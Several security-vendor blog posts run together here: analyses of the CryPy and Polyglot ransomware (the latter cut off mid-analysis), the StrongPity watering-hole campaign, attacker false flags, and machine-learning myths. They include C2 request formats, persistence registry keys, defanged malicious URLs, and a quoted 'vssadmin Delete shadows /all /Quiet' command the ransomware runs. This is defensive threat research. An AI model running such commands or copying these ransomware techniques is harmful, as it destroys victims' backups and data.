[userhome]\\My Documents\\
[userhome]\\My Music\\
[userhome]\\My Pictures\\
[userhome]\\My Videos\\
F:\\
.
.
Z:\\
*userhome - The current user home directory

When the encryption step is done, the ransomware will remove the restore points and write the README_FOR_DECRYPT.txt file and execute it. The following screen shot is the ransom note:

CryPy Ransomware Note embedded in the Python code

The threat actor behind the attack asks the victim to contact it via email, and to send a request to the following two email addresses to receive the decryption program:

(1) m4n14k@sigaint[.]org
(2) blackone@sigaint[.]org

Note that the ransom note contains mistakes, implying that it has been written by a non-English speaker. First, the headline is missing a ‘T’ in “IMPORTAN INFORMATION”. Second, the sentence “Decrypting of your files…” is syntatically wrong. Native speakers will be able to find additional mistakes.

The threat actor claims that files will be deleted every 6 hours, which reflects the approach of more advanced ransomwares. However, it forgets to mention proof of decryption or a channel that can be used in cases where the payment process is not responsive. This points to the executable being at an early stage of development.

The ransomware survives a reboot by adding the following keys to the registry:
Software\\Microsoft\\Windows\\CurrentVersion\\Run

regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run subkey Adobe_ReaderX data %TEMP%\\mw.exe regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run subkey explore_ data [userhome]\\Appdata\\local\\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe

The code for adding the values to the registry are located on the functions autorun() and autorun2().

These keys cause the computer to execute the files after the computer is restarted.

Right before launching the ransom note, the script calls a delete_shadow() function that takes no arguments, and simply executes the following command line code to remove all shadow copies and prevent recovery from backup:

os.system("vssadmin Delete shadows /all /Quiet")

Lastly, the file calls autorun2() fuction that copies the ransomware from its current location to C:\\Users\\\\AppData\\Local with hardcoded name:
DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe

C2 Communication

The ransomware hides behind an Israeli web server which was compromised using Shell script arbitrary upload written in PHP. The compromise and upload were possible because the server carried a vulnerable Magento CMS.

The executable transfers data over an unencrypted HTTP channel in clear-text. This allows for easy traffic inspection using a network listener. The following screenshot is the traffic being sent to the server:

Inspecting the Magento exploit and the compromised server, we found that the origin of the upload carries the title Pak Haxor – Auto Xploiter and the email ardiansyah09996@gmail[.]com and that the file was uploaded in August 2016, which aligns with the case in subject. The following screenshot reveals how attackers are using massive exploiters that scan for vulnerable web servers and exploit the vulnerability, which they later visit to expand their control over the server:

Part of such an exploitation technique is dropping additional PHP scripts to refine a more sophisticated attack, such as the CryPy ransomware.

One such script can be found hard-coded in the CryPy Python code, in the form of a GET request. The request is sent with two parameters to a script that was uploaded using the Auto Xploiter and carries the name victim.php. By reviewing the Python code it is easier to understand the type of data being presented in Base64 encoding format.

As seen in the screenshot above, the configurl parameter accepts a URL querystring where the victim_info input value of the info parameter is derived from the platform module.

uname() is used when one wants to return a tuple of system, node, release, version, machine and processor values. These are encoded with Base64.

The next parameter is ip which contains the socket.gethostname() which basically collects an IP address.

The querystring is then sent to urllib.urlopen(), which will send a GET request to the selected server and read the reponse content into glob_config.

The response contains a JSON format payload which is checked for the following keys:
x_ID – the victim’s unique ID to request their decryption keys after payment.
x_UDP – Not used; perhaps saved for future use.
x_PDP – Not used; perhaps saved for future use.

The second call is implemented in a function called generate_file() which is responsible for fetching a unique key for each file before encryption.

We have seen in recent lockers that, in order to demonstrate trust and integrity, the victim is able to decrypt one/two files before processing the payment. This proves decryptor validity. In order to randomly choose a file, the attacker must first generate a unique token for each one. The second PHP script found in the code is savekey.php which is described in the following screenshot and is suspected to have the C2 IP in it. It was however deleted long before we were able to reach it.

As for the first call, the second sends two parameters. The first is the file’s name and the other is the victim ID. In return, the server responds with two keys:
X – Unique key after encryption which will be appended to the file’s header.
Y – New filename which will be stored instead of the previous one.

These parameters are then sent to an encryption routine, along with the file’s original name.

IOCs REG Keys

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\explore_
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Adobe_ReaderX

Domains

hxxp://www.baraherbs[.]co.il/js/owebia/victim.php
hxxp://www.baraherbs[.]co.il/js/owebia/savekey.php

Hashes

8bd7cd1eee4594ad4886ac3f1a05273b crypy.exe
1ed3f127a0e94394ef049965bbc952ef encryptor.py

Emails

m4n14k@sigaint[.]com
blackone@sigaint[.]com

Five myths about machine learning in cybersecurity

Wed, 10/12/2016 - 06:35

Machine learning has long permeated all areas of human activity. It not only plays a key role in the recognition of speech, gestures, handwriting and images – without machine learning it would be difficult to imagine modern medicine, banking, bioinformatics and any type of quality control. Even the weather forecast cannot be made without machines capable of learning and generalization.

I would like to warn about, or dispel, some of the misconceptions associated with the use of ML in the field of cybersecurity.

Myth №1: Machine learning in information security is a novelty

For some reason, discussion of artificial intelligence in cybersecurity has become all the rage of late. If you haven’t been following this theme over the longer term, you may well think it’s something new.

A bit of background: one of the first machine learning algorithms, the artificial neural network, was invented in the 1950s. Interestingly, at that time it was thought the algorithm would quickly lead to the creation of “strong” artificial intelligence. That is, intelligence capable of thinking, understanding itself and solving other tasks in addition to those it was programmed for. Then there is so-called weak AI. It can solve some creative tasks – recognize images, predict the weather, play chess, etc. Now, 60 years later, we have a much better understanding of the fact that the creation of true AI will take years, and what today is referred to as artificial intelligence is in fact machine learning.

Source: http://dilbert.com/strip/2013-02-02

When it comes to cybersecurity, machine learning is nothing new either. Algorithms of this class were first implemented 10-12 years ago. At that time the amount of new malware was doubling every two years, and once it became clear that simple automation for virus analysts was not enough, a qualitative leap forward was required. That leap came in the form of processing the files in a virus collection, which made it possible to search for files similar to the one being examined. The final verdict about whether a file was malicious was issued by a human, but this function was almost immediately transferred to the robot.

In other words, there’s nothing new about machine learning in cybersecurity.

Myth №2: Machine learning in cybersecurity is straightforward – everything’s already been thought of

It’s true that for some spheres where machine learning is used there are a few ready-made algorithms. These spheres include facial and emotion recognition, or distinguishing cats from dogs. In these and many other cases, someone has done a lot of thinking, identified the necessary signs, selected an appropriate mathematical tool, set aside the necessary computing resources, and then made all their findings publicly available. Now, every schoolkid can use these algorithms.

Machine learning determines the quality of cookies by the number of chocolate chips and the radius of the cookie
Source: http://simplyinsight.co/2016/04/26/an-introduction-to-machine-learning-theory-and-its-applications-a-visual-tutorial-with-examples/

This creates the false impression that the algorithms already exist for malware detection too. That is not the case. We at Kaspersky Lab have spent more than 10 years developing and patenting a number of technologies. And we continue to carry out research and come up with new ideas because … well, that’s where the next myth comes in.

Myth №3: Machine learning – do it once and forget about it

There is a conceptual difference between malware detection and facial recognition. Faces will remain faces – nothing is going to change in that respect. In the majority of spheres where machine learning is used, the objective is not changing with time, while in the case of malware things are changing constantly and rapidly. That’s because cybercriminals are highly motivated people (money, espionage, terrorism…). Their intelligence is not artificial; they are actively combating and intentionally modifying malicious programs to get away from the trained model.

That’s why the model has to be constantly taught, sometimes even retrained from scratch. Obviously, with rapidly modifying malware, a security solution based on a model without an antivirus database is worthless. Cybercriminals can think creatively when necessary.

Myth №4: You can let security software learn on the client side

Let’s say, it processes the client’s files. Most of them will be clean, but some will be malicious. The latter are mutating, of course, but the model will learn.

However, it doesn’t work like that, because the number of malware samples passing through the computer of an average client is much smaller than the amount of malware samples collected by an antivirus lab system. And because there will be no samples for learning, there will be no generalization. Factor in the “creativity” of the virus writers (see the previous myth) and detection will fail, the model will start recognizing malware as clean files and will “learn the wrong things.”

Myth №5: It’s possible to develop a security solution that’s based solely on the ML model, without other detection methods

Why use multi-level protection based on different technologies? Why not put all your eggs in one basket if that basket is so smart and advanced? One algorithm is enough to solve everything. Right?

The thing is most malware belongs to families consisting of a large number of modifications of one malicious program. For example, Trojan-Ransom.Win32.Shade is a family of 30,000 cryptors. A model can be taught with a large number of samples, and it will gain the ability to detect future threats (within certain limits, see Myth №3). In these circumstances machine learning works well.

However, it’s often the case that a family consists of just a few samples, or even one. Perhaps the author didn’t want to go into battle with security software after his “brainchild” was immediately detected due to its behavior. Instead, he decided to attack those who had no security software installed or those who had no behavioral detection (i.e., those who had put all their eggs in one basket).

These sorts of “mini-families” cannot be used to teach a model – generalization (the essence of machine learning) is impossible with just one or two examples. In these circumstances, it is much more effective to detect a threat using time-tested methods based on the hash, masks, etc.

Another example is targeted attacks. The authors behind these attacks have no intention of producing more and more new samples. They create one sample for one victim, and you can be sure this sample will not be detected by a protection solution (unless it is a solution specifically designed for this purpose, for example, Kaspersky Anti-Targeted Attack Platform). Once again, hash-based detection is more effective.

Conclusion: different tools need to be used in different situations. Multi-level protection is more effective than a single level – more effective tools should not be neglected just because they are “out of fashion.”

The problem of Robocop

And one last thing. This is more of a warning than a myth. Researchers are currently paying more attention to what mistakes complex models are making: in some cases, the decisions they take, cannot be explained from the point of view of human logic.

Machine learning can be trusted. But critical systems (the autopilot in planes and automobiles, medicine, control services, etc.) usually have very strict quality standards; formal verification of software programs is used, while in machine learning, we delegate part of the thought process and responsibility to the machine. That’s why quality control of a model needs to be conducted by highly respected experts.

Trust me, I have a pen

Tue, 10/11/2016 - 12:40

Earlier today we became aware of a malicious website delivering Petya through the Hunter exploit kit. While there is nothing special about yet another exploit kit page, this one caught our attention because it mimics the index page of our sinkhole systems.

A malicious webpage faking one of our research systems

With cybercriminals increasingly trying to exploit trust relationships in cyberspace, it’s easy to get fooled by such attempts. We believe the criminals attempted to mimic our sinkhole systems in order to avoid being shut down by other researchers.

Just last week we were investigating a case of a serious attack that potentially breached a company. When we collected proof of the attack, we had to contact the company to help them isolate compromised systems and remediate. This brought us to a problem we commonly see today: the problem of trust.

The first reaction you normally have when someone calls you and attempts to convince you must arouse suspicion. In our investigations we normally deal with security personnel, who are highly paranoid people and do not trust anyone by nature. So far, the reaction of the company’s security staff was spot on: get the name of the caller, the company and department name, look up the company contacts using an independent, trusted, verifiable source, contact the company and confirm the facts, asking to connect to the researcher in the office immediately to do additional voice recognition. When that is done, the conversation can be resumed. Such a reaction and verification process is what we consider standard in our business. Unfortunately, we haven’t seen the same level of cautiousness among regular users.

A typical strategy for cybercriminals is to try to hide their tools, exploit kits and other malicious files on a compromised legitimate website or inject a malicious payload into a hijacked banner network account. Attackers also will rip entire websites, or just replace links to redirect visitors to attacker controlled sites, as we observed with the StrongPity watering holes. In this case, they simply counted on the confusion caused by visual appearance.

The fake webpage looks exactly the same as the original one from our research server and there is no point in finding even minor differences. Every webpage on the web can be copied and made to look identical to the source, except for the page’s original address or validated SSL certificate. PGPHtml is an alternative possibility, with each page explicitly stating its host domain or IP and then signed and verified with a public key. The server in question has been reportedly serving the Pony Trojan, hosting the Hunter Exploit Kit and distributing Petya ransomware.

We believe that this was the act of Russian-speaking cybercriminals, who send messages to our side every time their activities are affected by the work we do. We are bringing this to your attention to make you a little bit more cautious. Having said that, our first reaction was laughter, because it brought back some memories of an excellent short video on this matter shot by our colleagues from the security industry. And, because of this history of receiving messages from malware authors in their code and on sites, we think it is unlikely that this site is a watering hole targeting security researchers.

Unfortunately, this game of shadows is a well-known method not only in the criminal world but also in the world of advanced targeted attackers. We have seen in the past that some APT groups use deceiving tactics in order to try to confuse security researchers into wrong attribution. We have seen malware samples in the past where attackers from one group implanted decoys, trying to mimic the behaviour of their rivals. This is done to harden the research process or consume extra time. The attribution process, being the hardest part of any computer investigation, can easily be driven in the wrong direction. However, we have been looking at these attempts for a long time and learned to recognize such false flags. Now we would like you to be cautious and verify everything you see.

Related to this topic, our colleagues recently presented a more in-depth analysis of these techniques at VB 2016. You can read their entire paper here: Wave your false flags!

Wave your false flags!

Thu, 10/06/2016 - 04:58

 Download the full report (PDF)

As a new VirusBulletin is upon us, it’s once again time to deep dive into interesting topics in anti-malware research. This time around, we’ve chosen to focus on attribution in APT research, its methods and complications, and how intermediate-to-advanced attackers are already manipulating attribution indicators in an attempt to mislead researchers and squander limited incident response resources. False flags and deception tactics have always been discussed as possibilities in this space, but we wanted to put out a wealth of examples to advance the conversation. Our hope is that we can further the dialogue regarding attribution to involve more nuanced and daunting questions that have yet to be conclusively addressed.

When reading some of the examples, keep in mind that this was written back in February to submit to the VirusBulletin call for papers. At the time, deception techniques were a topic discussed in private between researchers, but never publicly substantiated. Since then, events over the summer have made this topic commonplace to the infosec community, if still a matter of contention and skepticism. The paper is extensive (but not exhaustive) and we hope that those of you interested in the subject will take some time to go through the reasoning and examples. The following are some takeaways we hope will pique your interest and get a dialogue going regarding the nuances of attribution as it’s currently being done:

There’s nothing straightforward about ‘whodunnit’

From the perspective of threat intelligence producers, there exist complications regarding attribution and its practical purpose. As any honest anti-malware company should admit, no institution has complete or perfect visibility into the activities of any threat actor. Different companies see different fragments; different types of service providers compliment that visibility with other types of data. This is a research space rewarded by cooperation and data exchanges. As such, when attempting to describe the activities of a threat actor, it’s difficult to suggest that a single threat intelligence product can stand as the exhaustive final chapter on any of the threat actors we investigate. Much less, provide a definitive picture of their identity, activities, and resources.

The true value of a threat intelligence product is its actionable potential, its ability to help detect and mitigate attacks, to provide clear avenues for proactive defense and improved defensive posture against a persistent and shadowy adversary, and to provide understanding to institutions and individuals outmatched and outwitted by the topdogs of the cyber espionage space. And even then, we have to consider that when it comes to wide dissemination of this information for the benefit of the public, it’s not just victims that are reading threat intelligence products. As our paper sets out to demonstrate, attackers too are keenly consuming threat intelligence research, learning from researcher methods as well as other APT groups and incorporating that information to better their own operations.

What can attribution do for you?

Threat Intelligence has come a long way in the last five years or so, and with that, more and more attribution is being done publicly by companies selling this as a product. Before that, attribution was only really done within governments and kept private or classified. These days, journalists and commentators are after the ‘sexy’ part of the story and are heavily focused on the “who” and not the “why”. While we are not arguing for or against companies performing attribution and publicly sharing their discoveries, we do pose some questions around how deep attribution really needs to go based on the role of the organization defended and its ability to take action. For governments, the most fidelity is justifiably needed, especially when the outcome of the attribution results in diplomatic sanctions, offensive operations, or demarches. But for a private company consuming threat intelligence is that level of attribution really needed to protect that organization against these attacks?

We hope the paper proves thought-provoking to threat intelligence producers and consumers alike, aligning needs and expectations, and preparing the infosec community for increasingly deceptive and manipulative interactions with our adversaries.

On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users

Mon, 10/03/2016 - 19:40

The StrongPity APT is a technically capable group operating under the radar for several years. The group has quietly deployed zero-day in the past, effectively spearphished targets, and maintains a modular toolset. What is most interesting about this group’s more recent activity however, is their focus on users of encryption tools, peaking this summer. In particular, the focus was on Italian and Belgian users, but the StrongPity watering holes affected systems in far more locations than just those two. Adding in their creative waterholing and poisoned installer tactics, we describe the StrongPity APT as not only determined and well-resourced, but fairly reckless and innovative as well.

Encryption Tools

Clearly this APT is interested in encrypted data and communications. The tools targeted by this group enable practices for securing secrecy and integrity of data. For example, WinRAR packs and encrypts files with strong suites like AES-256, and TrueCrypt encrypts full hard drives all in one swoop. Both WinRAR and TrueCrypt help provide strong and reliable encryption. WinRAR enables a person to encrypt a file with AES-256 in CBC mode with a strong PBKDF2 HMAC-SHA256 based key. And, TrueCrypt provides an effective open-source full disk encryption solution for Windows, Apple, Linux, and Android systems. Using both of these tools together, a sort of one off, poor man’s end-to-end encryption can be maintained for free by putting these two solutions together with free file sharing services.

Other software applications help to support encrypted sessions and communications. Well known applications supporting end-to-end encryption are used by hundreds of millions of folks, sometimes unknowingly, every day. IM clients like Microsoft’s Skype implement 256-bit AES encrypted communications, while Putty, Winscp and Windows Remote Desktop help provide private communications and sessions with fully encrypted communications as well. Most of these communications across the wire are currently unbreakable when intercepted, at least, when the applications are configured properly.

Summer 2016 Watering Hole Resources and Trickery – WinRAR and TrueCrypt

This actor set up a particularly clever site to deliver trojanized WinRAR installers in the summer of 2016, appears to have compromised another, and this activity reminds us somewhat of the early 2014 Crouching Yeti activity. Much of the Crouching Yeti intrusions were enabled by trojanizing legitimate ICS-related IT software installers like SCADA environment vpn client installers and industrial camera software driver installers. Then, they would compromise the legitimate company software distribution sites and replace the legitimate installers with the Crouching Yeti trojanized versions. The tactics effectively compromised ICS and SCADA related facilities and networks around the world. Simply put, even when visiting a legitimate company distribution site, IT staff was downloading and installing ICS-focused malware. StrongPity’s efforts did much the same.

In the case of StrongPity, the attackers were not focused on ICS or SCADA. They set up a domain name (ralrab[.]com) mimicking the legitimate WinRAR distribution site (rarlab[.]com), and then placed links on a legitimate “certified distributor” site in Europe to redirect to their poisoned installers hosted on ralrab[.]com. In Belgium, the attackers placed a “recommended” link to their ralrab[.]com site in the middle of the localized WinRAR distribution page on winrar[.]be. The big blue recommended button (here in French) linked to the malicious installer, while all the other links on the page directed to legitimate software:

Winrar[.]be site with “recommended link” leading to malicious ralrab[.]com

The winrar[.]be site evaluated what “recommended” package a visitor may need based on browser localization and processor capability, and accordingly offered up appropriate trojanized versions. Installer resources named for french and dutch versions, along with 32-bit versus 64-bit compiled executables were provided over the summer:

  • hxxp://www.ralrab[.]com/rar/winrar-x64-531.exe
  • hxxp://www.ralrab[.]com/rar/winrar-x64-531fr.exe
  • hxxp://www.ralrab[.]com/rar/winrar-x64-531nl.exe
  • hxxp://www.ralrab[.]com/rar/wrar531.exe
  • hxxp://www.ralrab[.]com/rar/wrar531fr.exe
  • hxxp://www.ralrab[.]com/rar/wrar531nl.exe
  • hxxp://ralrab[.]com/rar/winrar-x64-531.exe
  • hxxp://ralrab[.]com/rar/winrar-x64-531nl.exe
  • hxxp://ralrab[.]com/rar/wrar531fr.exe
  • hxxp://ralrab[.]com/rar/wrar531nl.exe
  • hxxp://ralrab[.]com/rar/wrar53b5.exe

Directory listing, poisoned StrongPity installers, at rarlrab[.]com

The first available visitor redirects from winrar[.]be to ralrab[.]com first appeared on May 28th, 2016, from the dutch speaking version of the winrar.be site. And around the same time, another “certified distributor” winrar[.]it served trojanized installers as well. The major difference here is that we didn’t record redirections to ralrab[.]com, but it appears the site directly served StrongPity trojanized installers:

  • hxxps://www.winrar[.]it/prelievo/WinRAR-x64-531it.exe
  • hxxps://www.winrar[.]it/prelievo/WRar531it.exe

The site started serving these executables a couple of days earlier on 5/24, where a large majority of Italian visitors where affected.

Download page, winrar[.]it

Quite simply, the download links on this site directed visitors to trojanized WinRAR installers hosted from the winrar.it site itself. It’s interesting to note that both of the sites are “distributors”, where the sites are owned and managed not by rarlabs, but by local owners in individual countries.

StrongPity also directed specific visitors from popular, localized software sharing sites directly to their trojanized installers. This activity continued into late September 2016. In particular, the group redirected visitors from software aggregation and sharing site tamindir[.]com to their attacker-controlled site at true-crypt[.]com. The StrongPity controlled Truecrypt site is a complete rip of the legitimate site, now hosted by Sourceforge. Here is the Tamindir truecrypt page, looks harmless enough.

TrueCrypt page, tamindir software sharing site

Unlike the newer poisoned WinRAR installers, StrongPity hosted several  Much like the poisoned WinRAR installers, multiple filenames have been used to keep up with visitor interests. Visitors may have been directed to the site by other means and downloaded directly from the ripped and persuasive site.

true-crypt[.]com malicious StrongPity distribution site

At the very bottom of the page, there are a couple of links to the poisoned installers:

  • hxxp://www.true-crypt[.]com/download/TrueCrypt-Setup-7.1a.exe
  • hxxp://true-crypt[.]com/files/TrueCrypt-7.2.exe

Referrers include these localized software aggregates and sharers:

  • gezginler[.]net/indir/truecrypt.html
  • tamindir[.]com/truecrypt/indir

It’s interesting that Ksn recorded appearance of the the file on two unique systems in December 2015, a third in January 2016, all in Turkey, and then nothing until May 2016. Then, deployment of the installers continued mostly within Turkey in July and September 2016.

Summer 2016 Watering Hole Victim Geolocations – WinRAR and TrueCrypt

Over the course of a little over a week, malware delivered from winrar.it appeared on over 600 systems throughout Europe and Northern Africa/Middle East. Likely, many more infections actually occurred. Accordingly, the country with the overwhelming number of detections was in Italy followed by Belgium and Algeria. The top countries with StrongPity malware from the winrar.it site from May 25th through the first few days of June are Italy, Belgium, Algeria, Cote D’Ivoire, Morroco, France, and Tunisia.

winrar[.]it StrongPity component geolocation distribution

In a similar time-span, the over sixty visitors redirected from winrar.be to ralrab.com for malicious file download were overwhelmingly located in one country. The top countries directed to StrongPity malware from the winrar.be site from May 25th through the first few days of June are Belgium, Algeria, Morroco, Netherlands, Canada, Cote D’Ivoire, and Tunisia.

winrar[.]be StrongPity component geolocation distribution

StrongPity previously set up TrueCrypt themed watering holes in late 2015. But their offensive activity surged in late summer 2016. The group set up a site directly pulled from the contents of the legitimate TrueCrypt website. From mid July to early September, dozens of visitors were redirected from tamindir[.]com to true-crypt[.]com with unsurprisingly almost all of the focus on systems in Turkey, with victims in the Netherlands as well.

tamindir[.]com to true-crypt[.]com poisoned TrueCrypt installer redirects

StrongPity Malware

The StrongPity droppers were often signed with unusual digital certificates, dropping multiple components that not only provide complete control of the victim system, but effectively steal disk contents, and can download components for further collection of various communications and contacts. Because we are talking about StrongPity watering holes, let’s take a quick look at what is being delivered by the group from these sites.

When we count all systems from 2016 infected with any one of the StrongPity components or a dropper, we see a more expansive picture. This data includes over 1,000 systems infected with a StrongPity component. The top five countries include Italy, Turkey, Belgium, Algeria, and France.

In the case of the winrar[.]be/ralrab[.]com watering hole malware, each one of the six droppers that we observed created a similar set of dropped components on disk. And, in these cases, the attackers did not re-use their fake digital certificates. In addition to installing the legitimate version of WinRAR, the dropper installed the following StrongPity components:

  • %temp%\procexp.exe
  • %temp%\sega\
  • nvvscv.exe
  • prst.cab
  • prst.dll
  • wndplyr.exe
  • wrlck.cab
  • wrlck.dll

Of these files, two are configurable and encrypted with the same keyless cipher, “wrlck.cab” and “prst.cab”. While one maintains several callback c2 for the backdoor to fetch more instructions and upload installed software and file paths, the other maintains something a bit more unusual. “prst.cab” maintains an encrypted list of programs that maintain encrypted connections. This simple encoding takes the most significant nibble for each character, swaps the nibbles of that byte, and xors the result against the original value. Its code looks something like this:

  • x = s[i];
  • j = ((x & 0xF0)>>4);
  • y = x ^ j;

Using that cipher in the ralrab[.]com malware, the package is configured to seek out several crypto-enabled software applications, highlighting the group’s interest in users of more encryption-supported software suites.

  • putty.exe (a windows SSH client)
  • filezilla.exe (supports ftps uploads)
  • winscp.exe (a windows secure copy application, providing encrypted and secure file transfer)
  • mstsc.exe (Windows Remote Desktop client, providing an encrypted connection to remote systems)
  • mRemoteNG.exe (a remote connections manager supporting SSH, RDP, and other encrypted protocols)

Also included in StrongPity components are keyloggers and additional data stealers.

Conclusion

Widely available, strong cryptography software tools help provide secure and private communications that are now easily obtained and usable. In the summer of 2016, multiple encryption-enabled software applications were targeted with watering hole, social engineering tactics, and spyware by the StrongPity APT. While watering holes and poisoned installers are tactics that have been effectively used by other APT, we have never seen the same focus on cryptographic-enabled software. When visiting sites and downloading encryption-enabled software, it has become necessary to verify the validity of the distribution site and the integrity of the downloaded file itself. Download sites not using PGP or strong digital code signing certificates need to re-examine the necessity of doing so for their own customers. We have seen other APT such as Crouching Yeti and Darkhotel distribute poisoned installers and poisoned executable code, then redistribute them through similar tactics and over p2p networks. Hopefully, simpler verification systems than the current batch of PGP and SSL applications will arise to be adopted in larger numbers. Until then, strong anti-malware and dynamic whitelisting solutions will be more necessary than ever.

For more details on APT tactics like StrongPity watering holes, contact intelreports@kaspersky.com.

Polyglot – the fake CTB-locker

Mon, 10/03/2016 - 04:58

Cryptor malware programs currently pose a very real cybersecurity threat to users and companies. Clearly, organizing effective security requires the use of security solutions that incorporate a broad range of technologies capable of preventing a cryptor program from landing on a potential victim’s computer or reacting quickly to stop an ongoing data encryption process and roll back any malicious changes. However, what can be done if an infection does occur and important data has been encrypted? (Infection can occur on nodes that, for whatever reason, were not protected by a security solution, or if the solution was disabled by an administrator.) In this case, the victim’s only hope is that the attackers made some mistakes when implementing the cryptographic algorithm, or used a weak encryption algorithm.

A brief description

The cryptor dubbed Polyglot emerged in late August. According to the information available to us, it is distributed in spam emails that contain a link to a malicious RAR archive. The archive contains the cryptor’s executable code.

Here are some examples of the links used:

hXXp://bank-info.gq/downloads/reshenie_suda.rar

hXXp://bank-info.gq/downloads/dogovor.rar

When the infected file is launched, nothing appears to happen. However, the cryptor copies itself under random names to a dozen or so places, writes itself to the autostart folder and to TaskScheduler. When the installation is complete, file encryption starts. The user’s files do not appear to change (their names remain the same), but the user is no longer able to open them.

When encryption is complete, the cryptor changes the desktop wallpaper, (interestingly, the wallpaper image is unique to each victim) and displays the ransom message.

The cryptor’s main window

New desktop wallpaper with the “open key” block unique to each victim computer

The user is offered the chance to decrypt several files for free.

The free trial decryption window

After this, the user is told to pay for file decryption in bitcoins. The cryptor contacts its C&C, which is located on the Tor network, for the ransom sum and the bitcoin address where it should be sent.

C&C communication window

From this moment on, the cryptor allows the user to check the ransom payment status on the C&C.

Ransom payment details

If the ransom is not paid on time, the cryptor notifies the user that it’s no longer possible to decrypt their files, and that it is about to ‘self-delete’.

Last window displayed by Polyglot

Imitating CTB-Locker

Initially, this cryptor caught our attention because it mimics all the features of another widespread cryptor – CTB-Locker (Trojan-Ransom.Win32.Onion). The graphical interface window, language switch, the sequence of actions for requesting the encryption key, the payment page, the desktop wallpapers – all of them are very similar to those used by CTB-Locker. The visual design has been copied very closely, while the messages in Polyglot’s windows have been copied word for word.

The main graphical interface windows:

Polyglot CTB-Locker

List of encrypted files:

Polyglot CTB-Locker

Window for the trial decryption of 5 random files:

Polyglot CTB-Locker

The private key request window:

Polyglot CTB-Locker

The desktop wallpapers:

Polyglot CTB-Locker

The ‘connection failed’ error message:

Polyglot CTB-Locker

Offline decryption instructions:

Polyglot CTB-Locker

The similarities do not stop there. Even the encryption algorithms used by the cybercriminals have clearly been chosen to imitate those used in CTB-Locker.

Polyglot CTB-Locker Algorithms used for file encryption File content is packed into a ZIP archive and then encrypted with AES-256. File content is compressed with Zlib and then encrypted with AES-256. Algorithms used while working with the keys ECDH (elliptic curve Diffie-Hellman), curve25519, SHA256. ECDH (elliptic curve Diffie-Hellman), curve25519, SHA256. Extensions of encrypted files File extensions are not changed. File extensions are changed, depending on version:
– .ctbl
– .ctb2
– 7 random lower-case Latin symbols Demo decryption 5 files are decrypted for free as a demo. Their decryption keys and file names are saved in the registry. 5 files are decrypted for free as a demo. Their decryption keys are only stored in the RAM memory while the process is running. C&C location C&C is in the Tor network, communication is via a public tor2web service. C&C is in the Tor network, communication is via a Tor client integrated into the Trojan, or (in some versions of CTB-Locker) via a public tor2web service. Traffic protection / obfuscation Bitwise NOT operation. AES encryption.

That said, we should note the following: a detailed analysis has revealed that Polyglot was developed independently from CTB-Locker; in other words, no shared code has been detected in the two Trojans (except the publicly available DLL code). Perhaps the creators of Polyglot wanted to disorient the victims and researchers, and created a near carbon copy of CTB-Locker from scratch to make it look like a CTB-Locker attack and that there was no hope of getting files decrypted for free.

C&C communication

The Trojan contacts the C&C server located on Tor via a public tor2web service, using the HTTP protocol.

Prior to each of the below data requests, a POST request is sent with the just one parameter: “live=1”.

Request 1.

At the start of operation, the Trojan reports the successful infection to the C&C. The following data is sent to the C&C:

{
“ip”:”xxx.xxx.xxx.xxx”,         //ip address of the infected computer
“method”:”register”,         //action type. “register” = Trojan informs C&C of new infection
“uid”:”xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx”,         //Infected computer’s ID
“version”:”10f”,         //Trojan version contained in its body
“info”:”Microsoft (build xxxx), 64-bit”,         //OS version on the infected computer
“description”:” “,         //Always a whitespace (” “)
“start_time”:”14740xxxxx”,         //Trojan’s start time
“end_time”:”0″,         //Encryption finish time. 0 = no encryption has run yet
“user_id”:”5″         //Number hardwired in the sample
}

This data block is passed through a bitwise NOT operation, encoded into Base64 and sent to the C&C in a POST request.

Contents of the sent request

Parameters of the POST request:

signature – CRC32 from the sent data
ver – Trojan version
gcdata – data, with contents as described above.

Request 1 and the reply received from the C&C

Request 2.

When the Trojan has finished encrypting the user’s data, it sends another request to the C&C. The content of the request is identical to that of request 1 except the field “end_time”, which now shows the time encryption was completed.

Request 3.

This is sent to the C&C to request the bitcoin address for payment and the ransom sum to be paid.

{
“method”:”getbtcpay”
“uid”:”xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx”
}

The C&C replies to this request with the following data:

{
“code”:”0″,
“text”:”OK”,
“address”:”xxxxxxxx”,         //bitcoin address (may vary)
“btc”:0.7,         //amount to be paid in BTC (may vary)
“usd”:319.98         //amount to be paid in USD (may vary)
}

Request 4.

This is sent to request a file decryption key from the C&C.

{
“method”:”getkeys”,
“key”:””,
“uid”:”xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx”,
“info”:[“DYqbX3m9u0Pk9bE9Rg2Co3empC2M/yrnqgNS3r0AT2vwCw8Zas08bd4BNiO3XuAqi6/5WQ0VBiUkRUToo+YFL/QtPkiRIQ/D9RyKhzpBHlNpf2hPb9eloDzpkonQl7L6cQyJ2FipEG2ggZOdTDBcNAEAAAA=”]
}

Request 5.

The Trojan reports that data decryption has been completed and states the number of decrypted files to the C&C.

{
“method”:”setend”,
“uid”:”xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx”,
“decrypted”:”1″
}

Description of the encryption algorithm

During our analysis of the malicious code, it became evident that the Trojan encrypts files in three stages, creating intermediate files:

  • First, the original file is placed in a password-protected ZIP archive. The archive has the same name as the original file plus the extension “a19”;
  • Polyglot encrypts the password-protected archive with the AES-256-ECB algorithm. The resulting file again uses the name of the original file, but the extension is now changed to “ap19”;
  • The Trojan deletes the original file and the file with the extension “a19”. The extension of the resulting file is changed from “ap19” to that of the original file.

Flowchart of the search and file encryption actions performed by Polyglot

A separate AES key is generated for each file, and is nothing more than a ‘shared secret’ generated according to the Diffie-Hellman protocol on an elliptic curve. However, first things first.

Before encrypting any files, the Trojan generates two random sequences, each 32 bytes long. The SHA256 digests of each sequence become the private keys s_ec_priv_1 and s_ec_priv_2. Then, the Bernstein elliptic curve (Curve25519) is used to obtain public keys s_ec_pub_1 and s_ec_pub_2 (respectively) from each private key.

